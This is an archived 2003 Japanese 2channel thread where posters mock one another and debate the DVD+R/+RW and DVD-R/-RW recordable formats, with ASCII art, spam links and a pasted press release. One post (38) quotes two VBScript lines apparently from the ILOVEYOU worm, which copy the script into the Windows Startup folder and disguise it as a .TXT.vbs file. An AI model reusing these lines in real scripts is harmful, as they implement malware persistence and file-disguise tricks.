2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

DVD+R/+RWの消滅を願うスレ

1 :名無しさん◎書き込み中:03/07/17 21:14 ID:sEvinQTI

             / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 |  どうか糞規格のDVD+R/+RWがはやく消滅しますように…
     ,__     | オナガイしまつ…
    /  ./\    \_____
  /  ./( ・ ).\       o〇       ヾ!;;;::iii|//"
/_____/ .(^O^) ,\   ∧∧         |;;;;::iii|/゙
 ̄|| || || ||. |っ¢..|| ̄   (,,  ,) ナムナム   |;;;;::iii|
  || || || ||./,,, |ゝ iii~   ⊂  ヾwwwjjrjww!;;;;::iii|jwjjrjww〃
  | ̄ ̄ ̄|~~凸( ̄)凸 .(   )〜 wjwjjrj从jwwjwjjrj从jr



2 :名無しさん◎書き込み中:03/07/17 21:16 ID:eaw5dbTC
削除依頼[済]sage

3 :名無しさん◎書き込み中:03/07/17 22:02 ID:BkRgU1+e
PD使え糞虫ども

4 :名無しさん◎書き込み中:03/07/17 22:05 ID:aVa0wNsY

                 Λ_Λ
                 ( ´Д` ) タテンナッテ  Λ_Λ 
   Λ_Λ         /    ,\      (´Д` ) イッテンダロ
   ( ´Д`) クソスレ     | l    l |     /    ,\ 
  /    \        | .;|;;:。;:,:、| ;|    ..,. | l    l |
  | l    l |     ..,. ., ヽ '゚;_。:_;./ /;-゚;・,。:゚;:.゚|;;|.   | ,|
  | |    | _|。.:_::゜。-.;.:゜;/_ン∩ソ/\;;:;.:.。:  ヽ '゚;。_ / /
  ヽ \_ .。'゚/   `。:、`;゜::;.:、,:゚;: .:..゜:: ゚。:..;: /_ン∩ソ/\ 
   /\_ン∩ソ\    ゚ ;:゚..゜:: ゚。:.:.:゚; ゚ ;:゚..;゚;  /  /`ー'ー'\ \
.  /  /`ー'ー'\ \    ゚ ;:゚..゜:: ;。:.:.::゚。;:;.:ヽ  <     / /
 〈  く     / /    ゚ ;:゚.。゜:;゚;゚.。.:`;:;.:.。 \ \    / /
.  \ L   ./ /     .;.:.;.゜::: ;。: ;:゚.゜:: :  .〉 )  ( .く,
    〉 )  ( .く,     ゚.;゚ヽ(`Д´)ノウワァァン(_,ノ   \.`)
   (_,ノ    .`ー'     ;:ヽ( >>1 )ノ:゚.;.:;



5 :名無しさん◎書き込み中:03/07/17 22:08 ID:7PZN1Z/A
しかし現実は+が巻き返してるんだよね。デルに続いてコンパック、NEC
富士通あたりも+採用が決まってるらしい。

6 :名無しさん◎書き込み中:03/07/17 22:42 ID:aAOX+2Gj
時代を読めないやつってや〜ね(w
S○NYのDDCDか、HSドライブでも使ってな

7 :名無しさん◎書き込み中:03/07/17 22:51 ID:e0AurwmV
世界糞スレ発見!
残念ながら>>1はボッシュートです。

       ⌒ ⌒ ⌒ シュルルル
     __⌒ ⌒ ⌒__
    /::::::::::Λ_Λ::::::::::::::::/
    /::::::::::(∩;´Д`)∩::::: /  チャラッチャラッチャーン♪ミヨヨヨーン…
   /::::::::::::(     /:::::/   
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

8 :名無しさん◎書き込み中:03/07/17 22:53 ID:UUu7ndUw
>>1はボッシュートだゴルァ!!

      ⌒ ⌒ ⌒
     __⌒ ⌒ ⌒__
    /::::::::::Λ_Λ::::::::::::::::::/
    /::::::::::(∩;,゚Д゚ )∩:::::::/  チャラッチャラッチャーン♪ミヨヨヨーン…
   /::::::::::::(     /:::::/
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

9 :名無しさん◎書き込み中:03/07/18 00:02 ID:FFgf0iJT
>>4
糞虫必死だなw

10 :名無しさん◎書き込み中:03/07/18 01:40 ID:HfgYzwJW
>>7-8
ワラタ

11 :名無しさん◎書き込み中:03/07/18 11:33 ID:urvGFs4K
きっと1はPC/AT時代到来に最後まで、NEC98に固執してたんだろ

この手のやからは、煮ても焼いても喰えないから、

ほうち、ちほう、ほうち、ちほう

12 :名無しさん◎書き込み中:03/07/20 18:59 ID:17BLt3Vw
>>5
それ海外の話ちゃうか?

13 :名無しさん◎書き込み中:03/07/28 18:25 ID:ow9G/uWL
>12
±R/±RWドライブが増えている事実。

14 :山崎 渉:03/08/02 02:22 ID:4eiOburn
(^^)

15 :名無しさん◎書き込み中:03/08/02 18:00 ID:tPmgQIkm
まぁ、DVD-R/-RWドライブって高倍速化が難しいのよ。
ただでさえ、after discにおいてLPPが抜きずらいのに、
高倍速時にはさらに難しくなる。

RAMは通常のDVDドライブとの互換が無いから論外。

っつーことで、+R/+RWが増えてきているのねん。

16 :名無しさん◎書き込み中:03/08/02 18:31 ID:oLUHqf6y
まああれだ。+使っている奴は将来メディア買うためにアメリカまで行くんだよ。
潔いね。

17 :名無しさん◎書き込み中:03/08/02 18:35 ID:1p0PcOXR
AV関係はほとんどRAMで決まりみたいな感じだけど、
PCは-R/-RWか+R/+RWのどちらかだろうね。
今流行ってるデュアルはあまり意味無いから、早くどっちかに
決まってほしい。

個人的には-R/-RWの方がいいな。

18 :名無しさん◎書き込み中:03/08/02 18:48 ID:UvllCUXN
>>14はボッシュート!!

       ⌒ ⌒ ⌒ シュルルル
     __⌒ ⌒ ⌒__
    /::::::::::Λ_Λ::::::::::::::::/
    /::::::::::(∩; ^^ )∩::::: /  チャラッチャラッチャーン♪ミヨヨヨーン…
   /::::::::::::(     /:::::/   
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

19 :名無しさん◎書き込み中:03/08/02 19:17 ID:VQaa72Pj
>>16
まああれだ。-使っている奴は将来メディア見つけるために地球中くまなく探すわけだ。
凄いね。


20 :名無しさん◎書き込み中:03/08/02 21:31 ID:oLUHqf6y
>>19
今パイオニアやシャープのDVDレコを持っている人はみなあぼーんでつか。
大胆すぎる予想でつよ。


21 :名無しさん◎書き込み中:03/08/02 21:49 ID:f4HCQsnJ
>>20
黄身、時代はブルーレイの時代にむかうんだよ。
ブルーレイではramチャンもrwチャンも、損しませんんでつ。

22 :名無しさん◎書き込み中:03/08/06 07:58 ID:zYC5BvCH
Q復活記念age

23 :名無しさん◎書き込み中:03/08/06 15:22 ID:mYqo484a
こんな「ほっといても確実に起こること」を願うスレはネット資産の無駄遣いなので
削除しておくように。

24 :_:03/08/06 15:32 ID:GDiZo8gr
http://homepage.mac.com/hiroyuki44/

25 :名無しさん◎書き込み中:03/08/06 15:42 ID:n9/YIbgI
±両対応のディスクが作れれば、+RWを高速RW規格としてフォーラムで吸収できるんだけどね。
でも案内溝の精度が違い過ぎるから無理だろうな。

26 :名無しさん◎書き込み中:03/08/06 19:10 ID:zvSGnbiz
>(RAMは)体感速度が遅く、急いでるときは結構つらいです。
そんなときはDVD+RWメディアを併用すると便利。最近はDVD-RWメディアでもいいかもしれませんが、
追記に関してはDVD+RWのほうが安心感があります。
http://homepage2.nifty.com/yss/gsa4040b/gsa4040b1.htm
 

27 :名無しさん◎書き込み中:03/08/06 23:47 ID:f77/AucJ
>こんな「ほっといても確実に起こること」を願うスレ

これ以外においては同意で削除願い

28 :名無しさん◎書き込み中:03/08/07 20:03 ID:+C830LFg
+R/+RW脂肪あげ

29 :名無しさん◎書き込み中:03/08/07 20:23 ID:PZL00UQK
ID:+C830LFg

IPが筒抜けの大間抜け。


30 :名無しさん◎書き込み中:03/08/07 21:19 ID:oGjsAkb3
自分が言われてんじゃん

http://pc3.2ch.net/test/read.cgi/cdr/1054085772/32

31 :名無しさん◎書き込み中:03/08/07 21:57 ID:gazWk6jf
>>30
シーッ。相手にすると馬鹿が移りますよ。

32 :直リン:03/08/07 22:01 ID:CUd1LPA6
http://homepage.mac.com/maki170001/

33 :名無しさん◎書き込み中:03/08/07 22:02 ID:pVrdoDRU
☆★ 新商品 ゾク・ゾク 入荷!! 急げ〜!! ☆★☆
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
☆★ 送料激安!  スピード発送!  商品豊富!   
★☆      http://www.get-dvd.com        
☆★ 激安DVDショップ 「GETDVDドットコム」 
★☆      http://www.get-dvd.com        
☆★ 今すぐアクセス Let’s Go!   急げ! 
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★


34 :名無しさん◎書き込み中:03/08/14 17:20 ID:ylPgR5ZQ
+R/+RW脂肪あげ

35 :名無しさん◎書き込み中:03/08/14 17:37 ID:MjwjjYxv
と脳内してる>>34w


36 :名無しさん◎書き込み中:03/08/14 21:57 ID:eKkxv7Ns
こんなスレにマメに書くなよ・・・

37 :名無しさん◎書き込み中:03/08/15 11:31 ID:ImM+Cfea
+R/+RW脂肪あげ

38 :名無しさん◎書き込み中:03/08/15 12:36 ID:/JDGrcd0
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 

39 :山崎 渉:03/08/15 15:11 ID:HrEfy4JM
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

40 :名無しさん◎書き込み中:03/08/26 14:20 ID:gk11Nzrr
既にDVD-R/RWドライブと大量のメディアを抱えている人に、「今すぐそのストックを
捨ててDVD+RW/+Rに乗り換えろ」とは言わないが、これからドライブの購入を考え
ている人には、DVD+RW/+Rを強くお勧めしたい。性能とコストパフォーマンスの両
面で、これが一番幸せになれるチョイスだ、と筆者は考える。

41 :名無しさん◎書き込み中:03/08/26 15:38 ID:ytHZcycJ
この手のスレ飽きた、と筆者は考える。

42 :名無しさん◎書き込み中:03/08/26 17:43 ID:vZFjLO0q
>>40
糞スレ上げんなボケェ!!

43 :RICOH User:03/09/20 16:14 ID:5lhB2oM4
って言うか、DVD+R/+RWよりDVD-RWは不要!
DVD-Video RecorderはDVD-RAM/R。
PCはDVD+R/+RW。
DVD-RWは現在も書換速度が遅い。

44 :名無しさん◎書き込み中:03/09/28 21:17 ID:H34DoW57

+厨梶田必死だな



45 :名無しさん◎書き込み中:03/10/04 09:32 ID:qqD6Kwcf
http://www.dvdrw.com/press/duallayer.htm

Philips will demonstrate its new dual-layer DVD recordable technology at the DVD+RW Alliance booth
at the CEATEC* JAPAN 2003 exhibition in Makuhari (Chiba, Japan) from October 7 to 11.
Developed by Philips Research in cooperation with MKM (Mitsubishi Kagaku Media)/Verbatim,
the technology virtually doubles data storage capacity on DVD recordable discs
from 4.7 Gbyte to 8.5 Gbyte while remaining compatible with existing DVD Video players and DVD-ROM drives.

フィリップスは、Makuhari(千葉(日本))の中のCEATEC*JAPAN 2003展示でDVD+RW連合ブースで
10月7日から11日までその新しい2重層DVD+R技術を実証するでしょう。
MKM(三菱Kagakuメディア)/Verbatimと協力するフィリップス研究によって開発されて、
技術は、既存のDVDビデオプレーヤおよびDVD-ROMドライブと互換性をもつままである間に
4.7Gbyteから8.5GbyteまでDVD-Rディスク上のデータ記憶容量を事実上2倍にします。


46 :RICOH User:03/10/10 21:49 ID:8uuEAV46
~ttp://www.watch.impress.co.jp/av/docs/20031009/dvd.htm
// また、DVD-Rは8倍速記録に、DVD-RWは4倍速を目指しており、ともにWG-6
//として10月にドラフトを配布、12月の完成を目指すという。なお、DVD-R
//は等速からの互換性を維持するが、-RWは2倍速から4倍速までのサポート
//となり、等速への対応は難しいという。

 DVD+RWの4倍速メディアでさえ1倍速書き込みに対応しているのにDVD-RWの
4倍速メディアは2倍速からって、どうゆうこと?
 DVD+RWは1倍速ドライブ自体がごく僅かの種類しかないのに1倍速に対応
しているって言うのに、DVD-RWは1倍速をサポートすることはDVD+RWや
DVD-RAM以上に重要なはず、DVD-RAMでも近々規格策定される5倍速DVD-RAM
かって1倍速をサポートしているのに、DVD-RWはちょっとヤバいんちゃうの?
これではDVD+R/+RWが消えるだのDVD-RAM脂肪だのって言う問題じゃない。
こっちは今ある記録型DVDで一番要らない規格はDVD-RWだと思う。
DVD+RWやDVD-RAMもPHILIPSや松下ががんばってる限り消滅は有り得ない。


47 :RICOH User:03/10/10 22:05 ID:8uuEAV46
>>44
 ちなみに僕は"+厨梶田"で結構です。
ただし、DVD-RAMは嫌いどころかむしろDVD+RWとDVD-RAMを最初にどれを
買おうか迷ったぐらいだ。ただ、DVD-RAMを選ばなかった理由は当時
(現在も)持っていたCOMBOドライブではDVD-RAMが読めないからっていう
点だけ。ちなみにドライブを買った目的はあくまでもデータのバック
アップだけだからDVD-ROMとしての書き込みが出来る出来ないは問題視
していない。
 話は大分ズレてしまったが、DVD+RWやDVD-RAMと比べて、当時のDVD-RW
はドライブの価格が異様に高い割りに使い勝手がいまいち良くない、幾ら
DVD-RやCD-R/RWが使えるとはいえ、あまり魅力的ではないと僕は思った。


48 :名無しさん◎書き込み中:03/10/10 22:25 ID:FlH3JsEv
>>46
なぜ上げるのかは知らんが、DVD-RWは最初からオマケ扱い。
つーか、PioneerがPC+RWマネて作った応急処置規格。
フォーラムでも積極的に扱ってない。
利点といってもCPRM対応ぐらい。
ユーザーだってDVD-Rドライブのおまけ程度にしか考えてないよ。

それは置いといて、低速サポートしないと問題あるの?
旧型ドライブユーザーは低速メディア使えばいい。
新型ドライブユーザーは高速メディアを使えばいいだけの話でしょ?
CD-RWだって住み分けできてるわけだし。

49 :RICOH User:03/10/10 22:28 ID:8uuEAV46
ちなみに現在使っているドライブは
PHILIPS 4424 CDRW (Mitsumi CR-4804TE?(あまり分からない))
I-O DATA CRWD-AB20D (RICOH RW9200A)
RICOH MP5120A
RICOH MP5240A
"RICOH User"の由来はRICOHのドライブばかり持っているから。ただし、
次に買うドライブはRICOH製ではないかもしれない。
長くてしかも板違いな事を書き込んでしまってゴメン。

50 :从o^ー^从御飯喰:03/10/11 01:03 ID:ZjL3+zVM
RAMは大嫌いです

51 :RICOH User:03/10/11 01:06 ID:4rEGQ40u
>>48
いや〜暇だったんでつい長々と書き込んでしまいました。
話は変わるが、別に僕はDVD-RW持っていないし、知り合いでもDVD-RAMドライブ
(又はビデオレコーダー)を持っている人はいるが、DVD-RWドライブ(ビデオ
レコーダー)を持っている人は今のところいないからあまりまともな事は言えな
いが、ただ、今のDVD+RWとDVD-RWはデータの読み書きの際のアドレッシングの方
法が少し違うだけでDVD+RWとDVD-RWは技術的にほとんど変わりないはずなのにな
ぜ1倍速書き込みに対応できないのかがイマイチ分からないから何でだろうと
思っただけ。



52 :RICOH User:03/10/11 01:09 ID:4rEGQ40u
>>48
Why?

53 :RICOH User:03/10/11 01:11 ID:4rEGQ40u
↑訂正
 >>50 の理由を知りたい。

54 :48:03/10/11 01:23 ID:iTT2RXDq
>>51
等倍速なら全く問題ないのだけれども、速度上げるとなると、
プリビットを記録しなきゃならない-RWには問題が出てくる。
たぶん、冷却時間を大幅に変えないと、記録できないんだよ。

55 :名無しさん◎書き込み中:03/10/18 12:09 ID:rSEf/Z06
>>54
技術的な問題もあるだろうけど
出回っている1倍速ドライブの機種数の問題もある。
今や新機種、新規格の一番のネックは互換性の調整とテスト時間だ。

+は1倍速ドライブが限られるからテスト対象に含めてもたいしたこと無い。

-は1倍速世代のドライブから全部テストしてたら
(読み×書き)の組合せパターンが爆発してしまって検証しきれない。

56 :名無しさん◎書き込み中:03/10/18 19:47 ID:v661oPZ3
http://www3.realint.com/cgi-bin/tarticles.cgi?dvdplus+1047


http://www.psx.sony.co.jp/product2.html
録画メディアは、DVD-R、DVD-RWと【DVD+RW】*に対応しています。

* ファームウエアアップグレードで対応。
  

57 :名無しさん◎書き込み中:03/10/18 19:57 ID:v661oPZ3
  ∧_∧
 (,,  *) )
  )   ⌒`,つ
  し'ー‐し' `、 ,,
       ⊂RAM゙_⊃
 
    

58 :名無しさん◎書き込み中:03/11/13 03:57 ID:CAajRqX6
>±RWは互換性に優れている

−Rがあれば十分じゃん。なに必死コイてんだ?>$ONY

59 :名無しさん◎書き込み中:03/12/17 10:46 ID:2h/7MbdB
+とか-とか何がどう違うんだ?

60 : ◆3zTzfgrLPs :03/12/17 16:22 ID:RC2DZ174
 

61 :名無しさん◎書き込み中:03/12/17 22:06 ID:e7I2E+4h
>>59
+はDVD+R/RWの名前の一部
-はDVD-R/RWの名前の前半と後半を分ける記号(ハイフン)

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)